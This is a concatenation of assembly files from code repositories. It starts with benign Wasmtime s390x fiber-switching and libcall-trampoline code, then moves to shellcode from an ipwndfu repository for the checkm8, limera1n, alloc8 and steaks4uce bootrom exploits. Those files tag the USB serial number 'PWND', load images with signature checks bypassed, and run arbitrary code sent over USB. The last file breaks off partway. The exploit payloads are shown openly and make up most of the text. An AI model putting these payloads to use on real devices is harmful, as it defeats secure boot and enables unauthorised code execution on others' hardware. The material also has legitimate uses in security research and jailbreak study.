// Also at this time this file is heavily based off the x86_64 file, so you'll
// probably want to read that one as well.
.text
#define CONCAT2(a, b) a ## b
#define CONCAT(a, b) CONCAT2(a , b)
#define VERSIONED_SYMBOL(a) CONCAT(a, VERSIONED_SUFFIX)
#define GLOBL(fnname) .globl VERSIONED_SYMBOL(fnname)
#define HIDDEN(fnname) .hidden VERSIONED_SYMBOL(fnname)
#define TYPE(fnname) .type VERSIONED_SYMBOL(fnname),@function
#define FUNCTION(fnname) VERSIONED_SYMBOL(fnname)
#define SIZE(fnname) .size VERSIONED_SYMBOL(fnname),.-VERSIONED_SYMBOL(fnname)
// fn(top_of_stack(%x0): *mut u8)
HIDDEN(wasmtime_fiber_switch)
GLOBL(wasmtime_fiber_switch)
.p2align 2
TYPE(wasmtime_fiber_switch)
FUNCTION(wasmtime_fiber_switch):
// Save all callee-saved registers on the stack since we're assuming
// they're clobbered as a result of the stack switch.
stmg %r6, %r15, 48(%r15)
aghi %r15, -64
std %f8, 0(%r15)
std %f9, 8(%r15)
std %f10, 16(%r15)
std %f11, 24(%r15)
std %f12, 32(%r15)
std %f13, 40(%r15)
std %f14, 48(%r15)
std %f15, 56(%r15)
// Load our previously saved stack pointer to resume to, and save off our
// current stack pointer on where to come back to eventually.
lg %r1, -16(%r2)
stg %r15, -16(%r2)
// Switch to the new stack and restore all our callee-saved registers after
// the switch and return to our new stack.
ld %f8, 0(%r1)
ld %f9, 8(%r1)
ld %f10, 16(%r1)
ld %f11, 24(%r1)
ld %f12, 32(%r1)
ld %f13, 40(%r1)
ld %f14, 48(%r1)
ld %f15, 56(%r1)
lmg %r6, %r15, 112(%r1)
br %r14
SIZE(wasmtime_fiber_switch)
// fn(
// top_of_stack(%x0): *mut u8,
// entry_point(%x1): extern fn(*mut u8, *mut u8),
// entry_arg0(%x2): *mut u8,
// )
HIDDEN(wasmtime_fiber_init)
GLOBL(wasmtime_fiber_init)
.p2align 2
TYPE(wasmtime_fiber_init)
FUNCTION(wasmtime_fiber_init):
larl %r1, FUNCTION(wasmtime_fiber_start)
stg %r1, -48(%r2) // wasmtime_fiber_start - restored into %r14
stg %r2, -112(%r2) // top_of_stack - restored into %r6
stg %r3, -104(%r2) // entry_point - restored into %r7
stg %r4, -96(%r2) // entry_arg0 - restored into %r8
aghi %r2, -160 // 160 bytes register save area
stg %r2, 120(%r2) // bottom of register save area - restored into %r15
// `wasmtime_fiber_switch` has a 64 byte stack.
aghi %r2, -64
stg %r2, 208(%r2)
br %r14
SIZE(wasmtime_fiber_init)
.p2align 2
TYPE(wasmtime_fiber_start)
FUNCTION(wasmtime_fiber_start):
.cfi_startproc simple
.cfi_def_cfa_offset 0
// See the x86_64 file for more commentary on what these CFI directives are
// doing. Like over there note that the relative offsets to registers here
// match the frame layout in `wasmtime_fiber_switch`.
.cfi_escape 0x0f, /* DW_CFA_def_cfa_expression */ \
7, /* the byte length of this expression */ \
0x7f, 0x90, 0x1, /* DW_OP_breg15 0x90 */ \
0x06, /* DW_OP_deref */ \
0x23, 0xe0, 0x1 /* DW_OP_plus_uconst 0xe0 */
.cfi_rel_offset 6, -112
.cfi_rel_offset 7, -104
.cfi_rel_offset 8, -96
.cfi_rel_offset 9, -88
.cfi_rel_offset 10, -80
.cfi_rel_offset 11, -72
.cfi_rel_offset 12, -64
.cfi_rel_offset 13, -56
.cfi_rel_offset 14, -48
.cfi_rel_offset 15, -40
// Load our two arguments prepared by `wasmtime_fiber_init`.
lgr %r2, %r8 // entry_arg0
lgr %r3, %r6 // top_of_stack
// ... and then we call the function! Note that this is a function call so
// our frame stays on the stack to backtrace through.
basr %r14, %r7 // entry_point
// .. technically we shouldn't get here, so just trap.
.word 0x0000
.cfi_endproc
SIZE(wasmtime_fiber_start)
// Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Mwneees/New | 4,052 | crates/wasmtime/src/runtime/vm/arch/s390x.S | // Currently `global_asm!` isn't stable on s390x, so this is an external
// assembler file built with the `build.rs`.
.machine z13
.text
.hidden host_to_wasm_trampoline
.globl host_to_wasm_trampoline
.type host_to_wasm_trampoline,@function
.p2align 2
#define CONCAT2(a, b) a ## b
#define CONCAT(a, b) CONCAT2(a , b)
#define VERSIONED_SYMBOL(a) CONCAT(a, VERSIONED_SUFFIX)
#define LIBCALL_TRAMPOLINE(libcall, libcall_impl) \
.hidden VERSIONED_SYMBOL(libcall) ; \
.globl VERSIONED_SYMBOL(libcall) ; \
.type VERSIONED_SYMBOL(libcall),@function ; \
.p2align 2 ; \
VERSIONED_SYMBOL(libcall): ; \
.cfi_startproc ; \
\
/* Load the pointer to `VMRuntimeLimits` in `%r1`. */ \
lg %r1, 8(%r2) ; \
\
/* Store the last Wasm FP into the `last_wasm_exit_fp` in the limits. */ \
lg %r0, 0(%r15) ; \
stg %r0, 24(%r1) ; \
\
/* Store the last Wasm PC into the `last_wasm_exit_pc` in the limits. */ \
stg %r14, 32(%r1) ; \
\
/* Tail call to the actual implementation of this libcall. */ \
jg VERSIONED_SYMBOL(libcall_impl) ; \
\
.cfi_endproc ; \
.size VERSIONED_SYMBOL(libcall),.-VERSIONED_SYMBOL(libcall)
LIBCALL_TRAMPOLINE(memory32_grow, impl_memory32_grow)
LIBCALL_TRAMPOLINE(table_grow_func_ref, impl_table_grow_func_ref)
LIBCALL_TRAMPOLINE(table_grow_externref, impl_table_grow_externref)
LIBCALL_TRAMPOLINE(table_fill_func_ref, impl_table_fill_func_ref)
LIBCALL_TRAMPOLINE(table_fill_externref, impl_table_fill_externref)
LIBCALL_TRAMPOLINE(table_copy, impl_table_copy)
LIBCALL_TRAMPOLINE(table_init, impl_table_init)
LIBCALL_TRAMPOLINE(elem_drop, impl_elem_drop)
LIBCALL_TRAMPOLINE(memory_copy, impl_memory_copy)
LIBCALL_TRAMPOLINE(memory_fill, impl_memory_fill)
LIBCALL_TRAMPOLINE(memory_init, impl_memory_init)
LIBCALL_TRAMPOLINE(ref_func, impl_ref_func)
LIBCALL_TRAMPOLINE(data_drop, impl_data_drop)
LIBCALL_TRAMPOLINE(table_get_lazy_init_func_ref, impl_table_get_lazy_init_func_ref)
LIBCALL_TRAMPOLINE(drop_gc_ref, impl_drop_gc_ref)
LIBCALL_TRAMPOLINE(gc, gc)
LIBCALL_TRAMPOLINE(gc_ref_global_get, impl_gc_ref_global_get)
LIBCALL_TRAMPOLINE(gc_ref_global_set, impl_gc_ref_global_set)
LIBCALL_TRAMPOLINE(memory_atomic_notify, impl_memory_atomic_notify)
LIBCALL_TRAMPOLINE(memory_atomic_wait32, impl_memory_atomic_wait32)
LIBCALL_TRAMPOLINE(memory_atomic_wait64, impl_memory_atomic_wait64)
LIBCALL_TRAMPOLINE(out_of_gas, impl_out_of_gas)
LIBCALL_TRAMPOLINE(new_epoch, impl_new_epoch)
LIBCALL_TRAMPOLINE(check_malloc, impl_check_malloc)
LIBCALL_TRAMPOLINE(check_free, impl_check_free)
LIBCALL_TRAMPOLINE(check_load, impl_check_load)
LIBCALL_TRAMPOLINE(check_store, impl_check_store)
LIBCALL_TRAMPOLINE(malloc_start, impl_malloc_start)
LIBCALL_TRAMPOLINE(free_start, impl_free_start)
LIBCALL_TRAMPOLINE(update_stack_pointer, impl_update_stack_pointer)
LIBCALL_TRAMPOLINE(update_mem_size, impl_update_mem_size)
|
n1z19/ipwndfu | 2,237 | src/checkm8_armv7.S | .text
.pool
.set PAYLOAD_OFFSET, 0xBAD00006
.set PAYLOAD_SIZE, 0xBAD00007
.set PAYLOAD_DEST, 0xBAD00005
.set PAYLOAD_PTR, 0xBAD00008
.set gUSBSerialNumber, 0xBAD00002
.set gUSBSRNMStringDescriptor, 0xBAD00004
.set gUSBDescriptors, 0xBAD00001
.set usb_create_string_descriptor, 0xBAD00003
.code 32
.global _main
_main:
MOV R4, #0 // HACK: do not free this usb request
PUSH {R4-R7,LR}
LDR R0, =gUSBDescriptors
LDRD R0, R1, [R0]
ADR R2, USB_DESCRIPTOR
LDRD R4, R5, [R2]
STRD R4, R5, [R0]
STRD R4, R5, [R1]
LDRD R4, R5, [R2,#0x8]
STRD R4, R5, [R0,#0x8]
STRD R4, R5, [R1,#0x8]
LDRD R4, R5, [R2,#0x10]
STRD R4, R5, [R0,#0x10]
STRD R4, R5, [R1,#0x10]
LDRD R4, R5, [R2,#0x18]
STRD R4, R5, [R0,#0x18]
STRD R4, R5, [R1,#0x18]
LDR R0, =gUSBSerialNumber
find_zero_loop:
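@ Advance to the NUL terminator of the current serial-number string so the
@ PWND tag below is appended after the existing contents.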
ADD R0, R0, #1
LDRB R1, [R0]
CMP R1, #0
BNE find_zero_loop
ADR R1, PWND_STRING
LDR R2, [R1]
LDR R3, [R1,#0x4]
STR R2, [R0]
STR R3, [R0,#0x4]
LDR R2, [R1,#0x8]
LDR R3, [R1,#0xC]
STR R2, [R0,#0x8]
STR R3, [R0,#0xC]
LDR R0, =gUSBSerialNumber
LDR R1, =usb_create_string_descriptor
LDR R4, =gUSBSRNMStringDescriptor
BLX R1
STRB R0, [R4]
LDR R0, =PAYLOAD_DEST
ADR R1, _main
LDR R2, =PAYLOAD_OFFSET
ADD R1, R1, R2
MOV R2, #0
LDR R3, =PAYLOAD_SIZE
LDR R4, =PAYLOAD_PTR
ADD R5, R0, #0x9
STR R5, [R4]
copy_loop:
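@ Copy the payload 0x40 bytes per iteration; the MCR below (DCCIMVAC) cleans
@ and invalidates the destination D-cache line so the copy reaches memory.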
LDRD R4, R5, [R1]
STRD R4, R5, [R0]
LDRD R4, R5, [R1,#0x8]
STRD R4, R5, [R0,#0x8]
LDRD R4, R5, [R1,#0x10]
STRD R4, R5, [R0,#0x10]
LDRD R4, R5, [R1,#0x18]
STRD R4, R5, [R0,#0x18]
LDRD R4, R5, [R1,#0x20]
STRD R4, R5, [R0,#0x20]
LDRD R4, R5, [R1,#0x28]
STRD R4, R5, [R0,#0x28]
LDRD R4, R5, [R1,#0x30]
STRD R4, R5, [R0,#0x30]
LDRD R4, R5, [R1,#0x38]
STRD R4, R5, [R0,#0x38]
MCR p15, 0, R0,c7,c14, 1
DMB SY
ADD R0, R0, #0x40
ADD R1, R1, #0x40
ADD R2, R2, #0x40
CMP R2, R3
BCC copy_loop
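@ Invalidate the entire instruction cache (ICIALLU) so the CPU fetches the
@ freshly copied payload instead of stale cache contents.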
MOV R0, #0
MCR p15, 0, R0, c7, c5, 0
DSB
ISB
POP {R4-R7,PC}
USB_DESCRIPTOR:
.word 0x190209, 0x80050101, 0x409fa, 0x1fe0000, 0x21070000, 0xa01, 0x8, 0x0
PWND_STRING:
.asciz " PWND:[checkm8]"
|
n1z19/ipwndfu | 7,690 | src/limera1n-shellcode.S | @ limera1n-shellcode.S
@ Author: axi0mX
@ Shellcode for limera1n exploit with minor improvements:
@ * supports 'exec' magic for code execution over USB
@ * reports PWND:[limera1n] in USB serial number string
.text
.pool
.set free, 0xBAD0000d
.set memz_create, 0xBAD0000f
.set memz_destroy, 0xBAD00011
.set image3_create_struct, 0xBAD00014
.set image3_load_continue, 0xBAD00015
.set image3_load_fail, 0xBAD00016
.set usb_wait_for_image, 0xBAD00009
.set jump_to, 0xBAD00010
.set nor_power_on, 0xBAD00005
.set nor_init, 0xBAD00006
.set memmove, 0xBAD00003
.set strlcat, 0xBAD00008
.set gLeakingDFUBuffer, 0xBAD0000c
.set gUSBSerialNumber, 0xBAD00007
.set RELOCATE_SHELLCODE_ADDRESS, 0xBAD00001
.set RELOCATE_SHELLCODE_SIZE, 0xBAD00002
.set MAIN_STACK_ADDRESS, 0xBAD00004
.set LOAD_ADDRESS, 0xBAD0000a
.set MAX_SIZE, 0xBAD0000b
.set EXEC_MAGIC, 0xBAD0000e
.set IMAGE3_LOAD_SP_OFFSET, 0xBAD00012
.set IMAGE3_LOAD_STRUCT_OFFSET, 0xBAD00013
.global _start
_start:
.code 16
B relocate_shellcode @ goto relocate_shellcode
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
relocate_shellcode:
MOV R1, PC
SUB R1, R1, #4 @ R1 = PC - 4
LDR R0, =RELOCATE_SHELLCODE_ADDRESS
CMP R0, R1
BEQ pwned_dfu_start @ if (R1 == RELOCATE_SHELLCODE_ADDRESS) goto pwned_dfu_start
LDR R2, =RELOCATE_SHELLCODE_SIZE
LDR R3, =memmove
BLX R3 @ memmove(RELOCATE_SHELLCODE_ADDRESS, R1, RELOCATE_SHELLCODE_SIZE)
LDR R3, =RELOCATE_SHELLCODE_ADDRESS
ADD R3, R3, #1
BX R3 @ goto (RELOCATE_SHELLCODE_ADDRESS + 1)
pwned_dfu_start:
LDR R0, =MAIN_STACK_ADDRESS
MOV SP, R0 @ SP = MAIN_STACK_ADDRESS
MOV R0, #1
MOV R1, #1
MOV R2, #0
LDR R3, =nor_power_on
BLX R3 @ nor_power_on(1, 1, 0)
MOV R0, #0
LDR R3, =nor_init
BLX R3 @ nor_init(0)
LDR R0, =gUSBSerialNumber
ADR R1, PWND_STRING
MOV R2, #120
LDR R3, =strlcat
BLX R3 @ strlcat(gUSBSerialNumber, PWND_STRING, 120)
pwned_dfu_loop:
LDR R3, =usb_wait_for_image
LDR R0, =LOAD_ADDRESS
LDR R1, =MAX_SIZE
BLX R3 @ R0 = usb_wait_for_image(LOAD_ADDRESS, MAX_SIZE)
MOV R4, R0 @ R4 = R0
LDR R1, =gLeakingDFUBuffer
LDR R0, [R1] @ R0 = gLeakingDFUBuffer
MOV R2, #0
STR R2, [R1] @ gLeakingDFUBuffer = 0
LDR R3, =free
BLX R3 @ free(R0)
CMP R4, #0
BLT pwned_dfu_loop @ if (R4 < 0) goto pwned_dfu_loop
LDR R5, =LOAD_ADDRESS
LDR R0, [R5] @ R0 = LOAD_ADDRESS[0]
LDR R1, =EXEC_MAGIC
CMP R0, R1
BNE pwned_dfu_not_exec_magic @ if (R0 != EXEC_MAGIC) goto pwned_dfu_not_exec_magic
LDR R0, [R5, #0x8] @ R0 = LOAD_ADDRESS[2] /* arg1 */
LDR R1, [R5, #0xC] @ R1 = LOAD_ADDRESS[3] /* arg2 */
LDR R2, [R5, #0x10] @ R2 = LOAD_ADDRESS[4] /* arg3 */
LDR R3, [R5, #0x14] @ R3 = LOAD_ADDRESS[5] /* arg4 */
LDR R4, [R5, #0x18]
STR R4, [SP] @ SP[0] = LOAD_ADDRESS[6] /* arg5 */
LDR R4, [R5, #0x1C]
STR R4, [SP, #0x4] @ SP[1] = LOAD_ADDRESS[7] /* arg6 */
LDR R4, [R5, #0x20]
STR R4, [SP, #0x8] @ SP[2] = LOAD_ADDRESS[8] /* arg7 */
LDR R4, [R5, #0x4]
BLX R4 @ R0 = LOAD_ADDRESS[1](R0, R1, R2, R3, SP[0], SP[1], SP[2])
STR R0, [R5, #4] @ LOAD_ADDRESS[1] = R0
MOV R1, #0
STR R1, [R5] @ LOAD_ADDRESS[0] = 0
B pwned_dfu_loop @ goto pwned_dfu_loop
pwned_dfu_not_exec_magic:
LDR R0, =LOAD_ADDRESS
MOV R1, R4
MOV R2, #0
LDR R3, =memz_create
BLX R3 @ R0 = memz_create(LOAD_ADDRESS, R4, 0)
CMP R0, #0
BEQ pwned_dfu_loop @ if (R0 == 0) goto pwned_dfu_loop /* out of memory :-| */
LDR R3, =LOAD_ADDRESS
STR R3, [SP] @ SP[0] = LOAD_ADDRESS
STR R4, [SP, #4] @ SP[1] = R4
MOV R4, R0 @ R4 = R0
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CBNZ R0, load_failed @ if (R0 != 0) goto load_failed
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
load_failed:
MOV R0, R4
LDR R3, =memz_destroy
BLX R3 @ memz_destroy(R4)
B pwned_dfu_loop @ goto pwned_dfu_loop
image3_load_no_signature_check:
PUSH {R4-R7, LR} @ push_registers(R4, R5, R6, R7, LR)
MOV R6, R11
MOV R5, R10
MOV R4, R8
PUSH {R4-R6} @ push_registers(R8, R10, R11)
ADD R7, SP, #0x18 @ R7 = SP + 0x18
LDR R4, =IMAGE3_LOAD_SP_OFFSET
MOV R5, SP
SUB R5, R5, R4
MOV SP, R5 @ SP = SP - IMAGE3_LOAD_SP_OFFSET
MOV R3, #0
LDR R4, =IMAGE3_LOAD_STRUCT_OFFSET
ADD R4, R5, R4
STR R3, [R4] @ *(SP + IMAGE3_LOAD_STRUCT_OFFSET) = 0
STR R2, [SP, #0x10] @ SP[4] = R2
STR R1, [SP, #0x14] @ SP[5] = R1
STR R3, [SP, #0x18] @ SP[6] = 0
LDR R6, [R1] @ R6 = *R1
MOV R10, R1 @ R10 = R1
MOV R11, R3 @ R11 = 0
LDR R1, =MAX_SIZE
MOV R8, R1 @ R8 = MAX_SIZE
LDR R2, [R0, #4]
CMP R2, R1
BGT img3_fail @ if (R0[1] > MAX_SIZE) goto img3_fail
MOV R8, R2 @ R8 = R0[1]
MOV R0, R4
MOV R1, R6
LDR R4, =image3_create_struct
BLX R4
MOV R4, R0 @ R4 = image3_create_struct(SP + IMAGE3_LOAD_STRUCT_OFFSET, R6, R8, 0)
LDR R3, =image3_load_continue @ R3 = image3_load_continue
CBZ R4, img3_branch_R3 @ if (R4 == 0) goto img3_branch_R3
img3_fail:
MOV R4, #1 @ R4 = 1
LDR R3, =image3_load_fail @ R3 = image3_load_fail
img3_branch_R3:
BX R3 @ goto R3
.align 2
PWND_STRING:
.ascii " PWND:[limera1n]\x00"
|
n1z19/ipwndfu | 8,764 | src/alloc8-shellcode.S | @ alloc8-shellcode.S
@ Author: axi0mX
@ Shellcode for alloc8 exploit with minor improvements:
@ * supports 'exec' magic for code execution over USB
@ * reports PWND:[alloc8] in USB serial number string
@ * enters pwned DFU on boot if home and power buttons are being held and cable is connected
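@
@ Rough pseudocode of the boot flow implemented below (a sketch, not
@ authoritative):
@   trim gNorImg3List and free the removed entries;
@   if (home_button_pressed() && power_button_pressed() && cable_connected())
@       goto pwned_dfu;
@   if ((llb = get_nor_image(ILLB_MAGIC)) != 0 &&
@       image3_load_no_signature_check(llb, &addr, &size) == 0)
@       jump_to(0, LOAD_ADDRESS, 0); /* boot LLB without signature checks */
@   goto pwned_dfu;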
.text
.pool
.set free, 0xBAD00004
.set get_nor_image, 0xBAD0000a
.set memz_create, 0xBAD00013
.set memz_destroy, 0xBAD00014
.set image3_create_struct, 0xBAD00017
.set image3_load_continue, 0xBAD00018
.set image3_load_fail, 0xBAD00019
.set usb_wait_for_image, 0xBAD00010
.set usb_create_serial_number_string, 0xBAD0000e
.set jump_to, 0xBAD0000d
.set exit_critical_section, 0xBAD00005
.set cable_connected, 0xBAD00008
.set power_button_pressed, 0xBAD00007
.set home_button_pressed, 0xBAD00006
.set clean_invalidate_data_cache, 0xBAD00002
.set strlcat, 0xBAD0000f
.set gNorImg3List, 0xBAD00003
.set gLeakingDFUBuffer, 0xBAD00011
.set MAIN_STACK_ADDRESS, 0xBAD00001
.set LOAD_ADDRESS, 0xBAD0000b
.set MAX_SIZE, 0xBAD0000c
.set ILLB_MAGIC, 0xBAD00009
.set MEMZ_STRUCT_MAGIC, 0xBAD00016
.set IMG3_STRUCT_MAGIC, 0xBAD00015
.set EXEC_MAGIC, 0xBAD00012
.global _start
_start:
.code 16
LDR R0, =MAIN_STACK_ADDRESS
MOV SP, R0 @ SP = MAIN_STACK_ADDRESS
LDR R0, =clean_invalidate_data_cache
BLX R0 @ clean_invalidate_data_cache()
LDR R4, =gNorImg3List @ R4 = &gNorImg3List
LDR R1, [R4, #4] @ R1 = R4[1]
LDR R5, [R1, #4] @ R5 = R1[1]
STR R4, [R1, #4] @ R1[1] = R4
STR R1, [R4] @ gNorImg3List = R1
LDR R6, =free @ R6 = free
free_loop:
CMP R4, R5
BEQ pwned_boot @ if (R4 == R5) goto pwned_boot
MOV R0, R5 @ R0 = R5
LDR R5, [R5, #4] @ R5 = R5[1]
BLX R6 @ free(R0)
B free_loop @ goto free_loop
pwned_boot:
SUB SP, SP, #0xC @ SP -= 0xC
LDR R3, =exit_critical_section
BLX R3 @ exit_critical_section()
LDR R3, =home_button_pressed
BLX R3 @ R0 = home_button_pressed()
CBZ R0, pwned_llb_boot @ if (R0 == 0) goto pwned_llb_boot
LDR R3, =power_button_pressed
BLX R3 @ R0 = power_button_pressed()
CBZ R0, pwned_llb_boot @ if (R0 == 0) goto pwned_llb_boot
LDR R3, =cable_connected
BLX R3 @ R0 = cable_connected()
CBNZ R0, pwned_dfu @ if (R0 != 0) goto pwned_dfu
pwned_llb_boot:
LDR R0, =ILLB_MAGIC
LDR R3, =get_nor_image
BLX R3 @ R0 = get_nor_image(ILLB_MAGIC)
CBZ R0, pwned_dfu @ if (R0 == 0) goto pwned_dfu
LDR R1, =LOAD_ADDRESS
STR R1, [SP] @ SP[0] = LOAD_ADDRESS
LDR R1, =MAX_SIZE
STR R1, [SP, #4] @ SP[1] = MAX_SIZE
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CBNZ R0, pwned_dfu @ if (R0 != 0) goto pwned_dfu
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
pwned_dfu:
MOV R0, #1
LDR R3, =usb_create_serial_number_string
BLX R3 @ R0 = usb_create_serial_number_string(1)
ADR R1, PWND_STRING
MOV R2, #120
LDR R3, =strlcat
BLX R3 @ strlcat(R0, PWND_STRING, 120)
pwned_dfu_loop:
LDR R0, =LOAD_ADDRESS
LDR R1, =MAX_SIZE
LDR R3, =usb_wait_for_image
BLX R3
MOV R4, R0 @ R4 = usb_wait_for_image(LOAD_ADDRESS, MAX_SIZE)
LDR R5, =gLeakingDFUBuffer
LDR R0, [R5]
LDR R3, =free
BLX R3 @ free(gLeakingDFUBuffer)
MOV R0, #0
STR R0, [R5] @ gLeakingDFUBuffer = 0
CMP R4, #0
BLT pwned_dfu_loop @ if (R4 < 0) goto pwned_dfu_loop
LDR R5, =LOAD_ADDRESS
LDR R0, [R5] @ R0 = LOAD_ADDRESS[0]
LDR R1, =EXEC_MAGIC
CMP R0, R1
BEQ pwned_dfu_exec_magic @ if (R0 == EXEC_MAGIC) goto pwned_dfu_exec_magic
LDR R0, =LOAD_ADDRESS
MOV R1, R4
MOV R2, #0
LDR R3, =memz_create
BLX R3
MOV R4, R0 @ R4 = memz_create(LOAD_ADDRESS, R4, 0)
CBZ R4, pwned_dfu_loop_end @ if (R4 == 0) goto pwned_dfu_loop_end
STR R5, [SP] @ SP[0] = LOAD_ADDRESS
STR R4, [SP, #4] @ SP[1] = R4
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CBNZ R0, pwned_dfu_load_failed @ if (R0 != 0) goto pwned_dfu_load_failed
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
pwned_dfu_load_failed:
MOV R0, R4
LDR R3, =memz_destroy
BLX R3 @ memz_destroy(R4)
pwned_dfu_loop_end:
B pwned_dfu_loop @ goto pwned_dfu_loop
pwned_dfu_exec_magic:
LDR R0, [R5, #0x8] @ R0 = LOAD_ADDRESS[2] /* arg1 */
LDR R1, [R5, #0xC] @ R1 = LOAD_ADDRESS[3] /* arg2 */
LDR R2, [R5, #0x10] @ R2 = LOAD_ADDRESS[4] /* arg3 */
LDR R3, [R5, #0x14] @ R3 = LOAD_ADDRESS[5] /* arg4 */
LDR R4, [R5, #0x18] /* TODO: Consider replacing with memmove? */
STR R4, [SP] @ SP[0] = LOAD_ADDRESS[6] /* arg5 */
LDR R4, [R5, #0x1C]
STR R4, [SP, #0x4] @ SP[1] = LOAD_ADDRESS[7] /* arg6 */
LDR R4, [R5, #0x20]
STR R4, [SP, #0x8] @ SP[2] = LOAD_ADDRESS[8] /* arg7 */
LDR R4, [R5, #0x4]
BLX R4 @ R0 = LOAD_ADDRESS[1](R0, R1, R2, R3, SP[0], SP[1], SP[2])
STR R0, [R5, #4] @ LOAD_ADDRESS[1] = R0
MOV R0, #0
STR R0, [R5] @ LOAD_ADDRESS[0] = 0
B pwned_dfu_loop @ goto pwned_dfu_loop
image3_load_no_signature_check:
PUSH {R4-R7, LR} /* TODO: Rewrite this ugly mess. */
MOV R6, R11
MOV R5, R10
MOV R4, R8
PUSH {R4-R6} @ push_registers(R8, R10, R11)
ADD R7, SP, #0x18 @ R7 = SP + 0x18
SUB SP, SP, #0x60 @ reserve 0x60 bytes of stack
STR R2, [SP, #0x10] @ SP[4] = R2
MOVS R3, #0
STR R3, [SP, #0x50] @ SP[20] = 0
LDR R6, [R1] @ R6 = *R1
MOV R10, R1 @ R10 = R1
MOVS R5, R0 @ R5 = R0
LDR R0, [R5, #4] @ R0 = R5[1]
MOV R8, R0 @ R8 = R5[1]
LDR R1, =MAX_SIZE
CMP R0, R1
BGT img3_bad_size @ if (R5[1] > MAX_SIZE) goto img3_bad_size
LDR R0, [R5, #0xC] @ R0 = R5[3]
LDR R1, =IMG3_STRUCT_MAGIC
CMP R0, R1
BNE not_nor_img3 @ if (R5[3] != IMG3_STRUCT_MAGIC) goto not_nor_img3
MOV R4, R8
STR R4, [SP] @ SP[0] = R8
LDR R4, [R5, #0x14] @ R4 = R5[5]
LDR R0, [R4, #8] @ R0 = R4[2]
LDR R1, =LOAD_ADDRESS
LDR R2, [R4, #0xC] @ R2 = R4[3]
MOVS R3, #0
LDR R4, [R0, #0x1C] @ R4 = R0[7]
BLX R4 @ R0 = R0[7](R0, LOAD_ADDRESS, R4[3], 0, R8)
CMP R0, R8
BNE img3_fail @ if (R0 != R8) goto img3_fail
B img3_continue @ goto img3_continue
not_nor_img3:
LDR R1, =MEMZ_STRUCT_MAGIC
CMP R0, R1
BNE img3_fail @ if (R5[3] != MEMZ_STRUCT_MAGIC) goto img3_fail
img3_continue:
ADD R0, SP, #0x50 @ R0 = &SP[20]
MOVS R1, R6 @ R1 = R6
MOV R2, R8 @ R2 = R8
MOVS R3, #0 @ R3 = 0
LDR R4, =image3_create_struct
BLX R4
MOV R4, R0 @ R4 = image3_create_struct(&SP[20], R6, R8, 0)
CBNZ R4, img3_fail @ if (R4 != 0) goto img3_fail
LDR R3, =image3_load_continue
BX R3 @ goto image3_load_continue
img3_bad_size:
MOV R8, R1 @ R8 = MAX_SIZE
img3_fail:
MOV R4, #1 @ R4 = 1
LDR R3, =image3_load_fail
BX R3 @ goto image3_load_fail
.align 2
PWND_STRING:
.ascii " PWND:[alloc8]\x00"
|
n1z19/ipwndfu | 8,151 | src/steaks4uce-shellcode.S | @ steaks4uce-shellcode.S
@ Author: axi0mX
@ Shellcode for steaks4uce exploit with minor improvements:
@ * reports PWND:[steaks4uce] in USB serial number string
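@
@ Relocation note (a sketch of the logic below): the shellcode may first run
@ from a temporary buffer, so after tearing down NOR/USB state it compares
@ PC against RELOCATE_SHELLCODE_ADDRESS and, if they differ, memmove()s
@ itself there and re-enters with BX to an odd address (bit 0 set) so the
@ core stays in Thumb state:
@
@   if (pc_base != RELOCATE_SHELLCODE_ADDRESS) {
@       memmove(RELOCATE_SHELLCODE_ADDRESS, pc_base, RELOCATE_SHELLCODE_SIZE);
@       ((void (*)(void))(RELOCATE_SHELLCODE_ADDRESS + 1))();
@   }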
.text
.pool
.set clean_data_cache, 0xBAD0000a
.set invalidate_instruction_cache, 0xBAD00006
.set usb_shutdown, 0xBAD00005
.set free, 0xBAD00011
.set memz_create, 0xBAD00013
.set memz_destroy, 0xBAD00015
.set image3_create_struct, 0xBAD00018
.set image3_load_continue, 0xBAD00019
.set image3_load_fail, 0xBAD0001a
.set usb_wait_for_image, 0xBAD0000d
.set jump_to, 0xBAD00014
.set nor_power_on, 0xBAD00002
.set nor_init, 0xBAD00003
.set usb_destroy, 0xBAD00004
.set memmove, 0xBAD00009
.set strlcat, 0xBAD0000c
.set gLeakingDFUBuffer, 0xBAD00010
.set gVersionString, 0xBAD0000b
.set RELOCATE_SHELLCODE_ADDRESS, 0xBAD00007
.set RELOCATE_SHELLCODE_SIZE, 0xBAD00008
.set MAIN_STACK_ADDRESS, 0xBAD00001
.set LOAD_ADDRESS, 0xBAD0000e
.set MAX_SIZE, 0xBAD0000f
.set EXEC_MAGIC, 0xBAD00012
.set IMAGE3_LOAD_SP_OFFSET, 0xBAD00016
.set IMAGE3_LOAD_STRUCT_OFFSET, 0xBAD00017
.global _start
.code 16
_start:
B pwned_dfu_start @ goto pwned_dfu_start
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
pwned_dfu_start:
LDR R0, =MAIN_STACK_ADDRESS
MOV SP, R0 @ SP = MAIN_STACK_ADDRESS
MOV R0, #1
MOV R1, #1
MOV R2, #0
LDR R3, =nor_power_on
BLX R3 @ nor_power_on(1, 1, 0)
MOV R0, #0
LDR R3, =nor_init
BLX R3 @ nor_init(0)
LDR R3, =usb_destroy
BLX R3 @ usb_destroy()
LDR R3, =usb_shutdown
BLX R3 @ usb_shutdown()
LDR R3, =invalidate_instruction_cache
BLX R3 @ invalidate_instruction_cache()
relocate_shellcode:
MOV R1, PC
SUB R1, R1, #4 @ R1 = PC - 4
LDR R0, =RELOCATE_SHELLCODE_ADDRESS
CMP R0, R1
BEQ pwned_dfu_loop @ if (R1 == RELOCATE_SHELLCODE_ADDRESS) goto pwned_dfu_loop
LDR R2, =RELOCATE_SHELLCODE_SIZE
LDR R3, =memmove
